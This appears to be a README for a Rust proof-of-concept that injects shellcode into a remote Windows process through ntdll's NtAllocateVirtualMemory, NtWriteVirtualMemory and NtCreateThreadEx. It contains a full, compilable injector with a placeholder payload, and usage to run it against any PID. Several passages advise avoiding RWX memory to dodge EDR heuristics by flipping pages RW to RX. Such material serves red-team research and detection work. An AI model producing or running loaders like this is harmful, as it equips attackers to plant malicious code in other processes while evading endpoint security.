Shellcode Execution via Remote Process using NtAPI

Overview

This Rust program demonstrates shellcode execution in a remote process using Windows NT API calls:

  • NtAllocateVirtualMemory
  • NtWriteVirtualMemory
  • NtCreateThreadEx

Download NtMapViewOfSection PoC: Download

How this program works

  1. Setup:

    • Accepts the target PID as the first command-line argument
    • Embeds the shellcode as a byte array (328 bytes; only part of it is reproduced in the source listing)
  2. Process Access:

    • Opens the target process with OpenProcess, requesting PROCESS_ALL_ACCESS. That is far more than the chain needs: the documented minimum for remote thread creation is PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, and a smaller mask is less likely to be refused on a hardened or differently-owned process
    • Obtains a handle to ntdll.dll and resolves the Nt* exports from it at run time (ntdll is already mapped into every process, so no new module is actually loaded)
  3. Memory Allocation:

    • Calls NtAllocateVirtualMemory to reserve and commit a region in the target process
    • Allocation type MEM_COMMIT | MEM_RESERVE (0x3000)
    • Protection PAGE_EXECUTE_READWRITE (0x40). A fresh RWX region in a remote process is one of the best-known EDR heuristics; the usual hardening is to allocate PAGE_READWRITE, write the payload, then switch the region to PAGE_EXECUTE_READ with NtProtectVirtualMemory so it is never writable and executable at the same time
  4. Shellcode Injection:

    • Copies the shellcode into the region with NtWriteVirtualMemory
  5. Execution:

    • Creates a thread in the target process with NtCreateThreadEx
    • Passes the base of the allocated region as the thread start address, so the new thread begins executing the shellcode
    • Requests MAXIMUM_ALLOWED (0x2000000) as the thread's desired access, which asks the object manager for every right the caller is entitled to instead of a fixed mask such as THREAD_ALL_ACCESS
  6. Cleanup:

    • Closes the process and thread handles (closing the thread handle does not stop the thread; the shellcode keeps running in the target)
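The six steps above, as an added example in the project's language. This is not the repository's code: it differs from the README's program in three deliberate ways, namely it requests only the rights remote thread creation needs instead of PROCESS_ALL_ACCESS, it allocates the region PAGE_READWRITE and flips it to PAGE_EXECUTE_READ with NtProtectVirtualMemory instead of asking for RWX up front, and it checks every NTSTATUS and closes the process handle on every exit path. The NtCreateThreadEx prototype is the undocumented one ntdll exports; the 3-byte `SHELLCODE` is a constructed placeholder (x64 `xor eax, eax ; ret`), not the README's 328-byte payload. The Windows-only part is gated on `cfg(windows)` so the file also builds elsewhere, where `inject` just returns an error.

```rust
// Added example, not the repository's code: the README's NtAPI injection chain written against
// raw ntdll exports, with three practitioner changes: a least-privilege process access mask
// instead of PROCESS_ALL_ACCESS, an RW allocation flipped to RX with NtProtectVirtualMemory
// instead of one RWX page, and an NTSTATUS check on every call. The Windows-only part is gated
// on cfg(windows); parse_pid and nt_success are portable so they can be unit-tested anywhere.
pub type NTSTATUS = i32;

/// Constructed placeholder payload (x64 `xor eax, eax ; ret`): the remote thread returns 0 at once.
pub const SHELLCODE: &[u8] = &[0x31, 0xC0, 0xC3];

/// NT_SUCCESS(): success, informational and warning codes are >= 0; error codes are negative.
pub fn nt_success(status: NTSTATUS) -> bool {
    status >= 0
}

/// Target PID from argv; rejects non-numeric input and PID 0 (the System Idle Process).
pub fn parse_pid(arg: &str) -> Result<u32, String> {
    match arg.trim().parse::<u32>() {
        Ok(0) => Err("PID 0 is not a valid target".to_string()),
        Ok(pid) => Ok(pid),
        Err(_) => Err(format!("'{arg}' is not a PID")),
    }
}

#[cfg(windows)]
pub unsafe fn inject(pid: u32, shellcode: &[u8]) -> Result<(), String> {
    use std::{ffi::c_void, ptr::null_mut};
    type HANDLE = *mut c_void;
    // Minimum documented rights for remote thread creation (winnt.h):
    // PROCESS_CREATE_THREAD | QUERY_INFORMATION | VM_OPERATION | VM_READ | VM_WRITE.
    const PROCESS_INJECT_ACCESS: u32 = 0x0002 | 0x0400 | 0x0008 | 0x0010 | 0x0020;
    const THREAD_ALL_ACCESS: u32 = 0x001F_FFFF;
    const MEM_COMMIT_RESERVE: u32 = 0x1000 | 0x2000;
    const PAGE_READWRITE: u32 = 0x04;
    const PAGE_EXECUTE_READ: u32 = 0x20;
    #[link(name = "kernel32")]
    unsafe extern "system" {
        fn OpenProcess(access: u32, inherit: i32, pid: u32) -> HANDLE;
        fn CloseHandle(h: HANDLE) -> i32;
        fn GetModuleHandleA(name: *const u8) -> HANDLE;
        fn GetProcAddress(module: HANDLE, name: *const u8) -> *mut c_void;
        fn GetLastError() -> u32;
    }
    // Undocumented but stable ntdll prototypes, NTSTATUS NTAPI Nt*(...).
    type NtAllocateVirtualMemory = unsafe extern "system" fn(HANDLE, *mut *mut c_void, usize, *mut usize, u32, u32) -> NTSTATUS;
    type NtWriteVirtualMemory = unsafe extern "system" fn(HANDLE, *mut c_void, *const c_void, usize, *mut usize) -> NTSTATUS;
    type NtProtectVirtualMemory = unsafe extern "system" fn(HANDLE, *mut *mut c_void, *mut usize, u32, *mut u32) -> NTSTATUS;
    type NtCreateThreadEx = unsafe extern "system" fn(*mut HANDLE, u32, *mut c_void, HANDLE, *mut c_void, *mut c_void, u32, usize, usize, usize, *mut c_void) -> NTSTATUS;
    // Resolve a NUL-terminated export name to a typed fn pointer (same size as a data pointer on Windows).
    unsafe fn resolve<T: Copy>(module: HANDLE, name: &[u8]) -> Result<T, String> {
        let p = unsafe { GetProcAddress(module, name.as_ptr()) };
        if p.is_null() { return Err(format!("{} not exported", String::from_utf8_lossy(&name[..name.len() - 1]))); }
        Ok(unsafe { std::mem::transmute_copy::<*mut c_void, T>(&p) })
    }
    // ntdll is already mapped into every process, so a module handle is enough (no LoadLibrary).
    let ntdll = unsafe { GetModuleHandleA(b"ntdll.dll\0".as_ptr()) };
    if ntdll.is_null() { return Err("ntdll.dll not mapped".into()); }
    let nt_alloc: NtAllocateVirtualMemory = unsafe { resolve(ntdll, b"NtAllocateVirtualMemory\0")? };
    let nt_write: NtWriteVirtualMemory = unsafe { resolve(ntdll, b"NtWriteVirtualMemory\0")? };
    let nt_protect: NtProtectVirtualMemory = unsafe { resolve(ntdll, b"NtProtectVirtualMemory\0")? };
    let nt_thread: NtCreateThreadEx = unsafe { resolve(ntdll, b"NtCreateThreadEx\0")? };
    let process = unsafe { OpenProcess(PROCESS_INJECT_ACCESS, 0, pid) };
    if process.is_null() { return Err(format!("OpenProcess({pid}): Win32 error {}", unsafe { GetLastError() })); }
    // Run the chain in a closure so every failure path below still closes the process handle.
    let result = (|| -> Result<(), String> {
        let mut base: *mut c_void = null_mut();
        let mut size = shellcode.len(); // the kernel rounds this up to a page and writes it back
        let st = unsafe { nt_alloc(process, &mut base, 0, &mut size, MEM_COMMIT_RESERVE, PAGE_READWRITE) };
        if !nt_success(st) { return Err(format!("NtAllocateVirtualMemory: {st:#x}")); }
        let mut written = 0usize;
        let st = unsafe { nt_write(process, base, shellcode.as_ptr().cast(), shellcode.len(), &mut written) };
        if !nt_success(st) || written != shellcode.len() { return Err(format!("NtWriteVirtualMemory: {st:#x}, {written} bytes")); }
        // RW -> RX: the region is never writable and executable at the same time.
        let mut old = 0u32;
        let st = unsafe { nt_protect(process, &mut base, &mut size, PAGE_EXECUTE_READ, &mut old) };
        if !nt_success(st) { return Err(format!("NtProtectVirtualMemory: {st:#x}")); }
        let mut thread: HANDLE = null_mut();
        let st = unsafe { nt_thread(&mut thread, THREAD_ALL_ACCESS, null_mut(), process, base, null_mut(), 0, 0, 0, 0, null_mut()) };
        if !nt_success(st) { return Err(format!("NtCreateThreadEx: {st:#x}")); }
        unsafe { CloseHandle(thread) }; // closing the handle does not stop the thread
        Ok(())
    })();
    unsafe { CloseHandle(process) };
    result
}

#[cfg(not(windows))]
pub unsafe fn inject(_pid: u32, _shellcode: &[u8]) -> Result<(), String> {
    Err("NtAPI injection only runs on Windows".to_string())
}

fn main() {
    let pid = parse_pid(&std::env::args().nth(1).unwrap_or_default())
        .unwrap_or_else(|e| { eprintln!("usage: inject <target_pid> ({e})"); std::process::exit(2) });
    match unsafe { inject(pid, SHELLCODE) } {
        Ok(()) => println!("shellcode thread started in pid {pid}"),
        Err(e) => { eprintln!("{e}"); std::process::exit(1) }
    }
}
```

The NTSTATUS values are printed as two's-complement hex, so a failed OpenProcess on another user's process shows up as Win32 error 5 and a refused remote allocation as 0xc0000022 (STATUS_ACCESS_DENIED), which is the first thing to check when the chain fails against a protected process.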

Functionality

  1. Allocates memory in the target process
  2. Writes shellcode to the allocated memory
  3. Creates a thread to execute the shellcode

Requirements

  • rustc 1.85.1 (4eb161250 2025-03-15)
  • Rust toolchain (stable-x86_64-pc-windows-msvc (default))
  • Target process PID

Usage

cargo run --release -- <target_pid>

The `--` separates cargo's own options from the arguments handed to the binary. The calling user must be able to open the target process: injecting into a process owned by another user or into a protected process fails at OpenProcess with ERROR_ACCESS_DENIED.

Credits / Resources